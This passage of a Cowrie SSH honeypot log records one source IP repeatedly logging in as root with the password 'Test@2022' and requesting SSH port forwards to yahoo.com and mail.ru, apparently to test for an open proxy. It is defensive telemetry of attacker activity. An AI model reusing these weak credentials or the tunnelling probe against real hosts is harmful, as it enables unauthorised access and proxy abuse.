{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:57.585291Z","src_ip":"77.83.207.83","session":"544526ee6f3c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":15156,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:15156","sensor":"my-vps","timestamp":"2025-08-31T03:45:57.735938Z","session":"544526ee6f3c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:57.789494Z","src_ip":"77.83.207.83","session":"544526ee6f3c"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:57.843725Z","src_ip":"77.83.207.83","session":"544526ee6f3c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":52423,"dst_ip":"1.2.3.4","dst_port":22,"session":"88a3f1c997d5","protocol":"ssh","message":"New connection: 77.83.207.83:52423 (1.2.3.4:22) [session: 88a3f1c997d5]","sensor":"my-vps","timestamp":"2025-08-31T03:45:57.892122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:57.893020Z","src_ip":"77.83.207.83","session":"88a3f1c997d5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:57.943077Z","src_ip":"77.83.207.83","session":"88a3f1c997d5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:58.191073Z","src_ip":"77.83.207.83","session":"88a3f1c997d5"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:58.205835Z","src_ip":"212.227.235.229","session":"74fc0d1cee63"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13801,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:13801","sensor":"my-vps","timestamp":"2025-08-31T03:45:58.242188Z","session":"88a3f1c997d5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:58.292540Z","src_ip":"77.83.207.83","session":"88a3f1c997d5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":16109,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:16109","sensor":"my-vps","timestamp":"2025-08-31T03:45:58.436228Z","session":"88a3f1c997d5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:58.486237Z","src_ip":"77.83.207.83","session":"88a3f1c997d5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":23126,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:23126","sensor":"my-vps","timestamp":"2025-08-31T03:45:58.628282Z","session":"88a3f1c997d5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:58.678408Z","src_ip":"77.83.207.83","session":"88a3f1c997d5"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:58.729319Z","src_ip":"77.83.207.83","session":"88a3f1c997d5"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":52523,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1c611c8dc1b","protocol":"ssh","message":"New connection: 77.83.207.83:52523 (1.2.3.4:22) [session: e1c611c8dc1b]","sensor":"my-vps","timestamp":"2025-08-31T03:45:58.778790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:58.779466Z","src_ip":"77.83.207.83","session":"e1c611c8dc1b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:58.830140Z","src_ip":"77.83.207.83","session":"e1c611c8dc1b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:59.081943Z","src_ip":"77.83.207.83","session":"e1c611c8dc1b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":7643,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:7643","sensor":"my-vps","timestamp":"2025-08-31T03:45:59.134746Z","session":"e1c611c8dc1b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:59.185575Z","src_ip":"77.83.207.83","session":"e1c611c8dc1b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":25988,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:25988","sensor":"my-vps","timestamp":"2025-08-31T03:45:59.329088Z","session":"e1c611c8dc1b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:59.380118Z","src_ip":"77.83.207.83","session":"e1c611c8dc1b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":27334,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:27334","sensor":"my-vps","timestamp":"2025-08-31T03:45:59.525112Z","session":"e1c611c8dc1b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:59.575860Z","src_ip":"77.83.207.83","session":"e1c611c8dc1b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:59.627116Z","src_ip":"77.83.207.83","session":"e1c611c8dc1b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":52617,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb79f2b2edfb","protocol":"ssh","message":"New connection: 77.83.207.83:52617 (1.2.3.4:22) [session: eb79f2b2edfb]","sensor":"my-vps","timestamp":"2025-08-31T03:45:59.675859Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:59.677089Z","src_ip":"77.83.207.83","session":"eb79f2b2edfb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:59.726816Z","src_ip":"77.83.207.83","session":"eb79f2b2edfb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:59.974911Z","src_ip":"77.83.207.83","session":"eb79f2b2edfb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14752,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:14752","sensor":"my-vps","timestamp":"2025-08-31T03:46:00.025833Z","session":"eb79f2b2edfb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:00.075848Z","src_ip":"77.83.207.83","session":"eb79f2b2edfb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":7023,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:7023","sensor":"my-vps","timestamp":"2025-08-31T03:46:00.216235Z","session":"eb79f2b2edfb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:00.266524Z","src_ip":"77.83.207.83","session":"eb79f2b2edfb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":3475,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:3475","sensor":"my-vps","timestamp":"2025-08-31T03:46:00.408483Z","session":"eb79f2b2edfb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:00.458360Z","src_ip":"77.83.207.83","session":"eb79f2b2edfb"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:00.509615Z","src_ip":"77.83.207.83","session":"eb79f2b2edfb"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":52712,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e1eae41c787","protocol":"ssh","message":"New connection: 77.83.207.83:52712 (1.2.3.4:22) [session: 4e1eae41c787]","sensor":"my-vps","timestamp":"2025-08-31T03:46:00.559433Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:00.569428Z","src_ip":"77.83.207.83","session":"4e1eae41c787"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:00.609781Z","src_ip":"77.83.207.83","session":"4e1eae41c787"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:00.860307Z","src_ip":"77.83.207.83","session":"4e1eae41c787"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":18979,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:18979","sensor":"my-vps","timestamp":"2025-08-31T03:46:00.912673Z","session":"4e1eae41c787"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:00.962845Z","src_ip":"77.83.207.83","session":"4e1eae41c787"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":23349,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:23349","sensor":"my-vps","timestamp":"2025-08-31T03:46:01.104592Z","session":"4e1eae41c787"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:01.155251Z","src_ip":"77.83.207.83","session":"4e1eae41c787"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":13711,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:13711","sensor":"my-vps","timestamp":"2025-08-31T03:46:01.296513Z","session":"4e1eae41c787"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:01.346813Z","src_ip":"77.83.207.83","session":"4e1eae41c787"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:01.397883Z","src_ip":"77.83.207.83","session":"4e1eae41c787"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":52811,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3c3e639cad5","protocol":"ssh","message":"New connection: 77.83.207.83:52811 (1.2.3.4:22) [session: e3c3e639cad5]","sensor":"my-vps","timestamp":"2025-08-31T03:46:01.446165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:01.447118Z","src_ip":"77.83.207.83","session":"e3c3e639cad5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 